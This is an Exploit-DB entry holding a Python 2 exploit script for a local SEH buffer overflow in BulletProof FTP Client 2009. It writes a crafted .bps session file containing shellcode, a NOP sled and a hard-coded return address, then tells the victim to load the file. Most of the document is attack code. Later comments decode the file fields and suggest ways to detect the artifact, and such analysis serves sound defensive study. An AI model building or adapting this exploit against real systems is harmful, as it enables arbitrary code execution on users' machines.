BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)

EDB-ID:

8420


Author:

His0k4

Type:

local


Platform:

Windows

Date:

2009-04-13


#!/usr/bin/python
#[*] Bug : 	    BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits :      Stack
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Proof-of-concept payload: per the line above it is a Metasploit-generated
# "run calc.exe" stub (160 bytes, PexFnstenvSub-encoded). Everything below is
# Python 2 (print statement, str holding raw bytes).
shellcode=(
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb"
"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9"
"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06"
"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5"
"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89"
"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d")

# Session-file preamble. The hex decodes to plain ASCII:
#   "This is a BulletProof FTP Client Session-File and should not be
#    modified directly.\r\n"
# i.e. the ordinary first line of a .bps file, so the crafted file is only
# distinguishable from a legitimate session by the oversized field after it.
header1=(
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74"
"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74"
"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e"
"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20"
"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
"\x79\x2e\x0d\x0a")

# The overlong field: a hostname-looking prefix, a 68-byte NOP sled, then two
# hard-coded 4-byte values and the payload. The title calls this an SEH
# overwrite, so the two 4-byte values are presumably the next-SEH / handler
# pair; the second is an address the author attributes to oleacc.dll on
# XP SP2 (French build per the file header) — it is build-specific and has
# no meaning on any other image or OS. The whole field is a static, fixed
# string, which is what makes this artifact easy to fingerprint (see below).
exploit =  "passwords.hotmail.com"
exploit += "\x90"*68
exploit += "\x74\x06\x90\x90" #oplaa!
exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
exploit += shellcode

# Remaining session fields, decoded from the hex:
#   "\n21\r\n" "ABABC\r\n" "bphgqdnbjjgaeb\r\n" "c:\\\r\n" "/\r\n"
# "21" looks like the FTP port and "c:\" / "/" like local/remote directories;
# the exact meaning of each line is not stated anywhere in this file.
header2=(
"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
"\x2f\x0d\x0a")

# Final file image = preamble + overlong field + trailing fields.
vuln = header1 + exploit + header2

# Writes the file in text mode ('w'). On Windows that mode translates "\n" to
# "\r\n", and header2 contains bare "\x0a" bytes, so the on-disk bytes can
# differ from `vuln` depending on where the script is run; 'wb' would be the
# byte-exact choice. The bare except hides the real error (e.g. a permission
# failure on the working directory) behind a generic message.
# Defensive note: the artifact is a .bps file whose second field is a
# ~250-byte blob of NOPs and non-printable bytes where a short hostname is
# expected — a simple length / printable-ratio check on that field, or a
# signature on the fixed sled + address pair above, detects this PoC. The
# local attack still needs a user to load the file by hand (File > Load BP
# Session, as the success message says), so it is a user-assisted local
# file-format overflow, not a remote one.
try:
    out_file = open("sploit.bps",'w')
    out_file.write(vuln)
    out_file.close()
    print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
except:
    print "Error!"

# milw0rm.com [2009-04-13]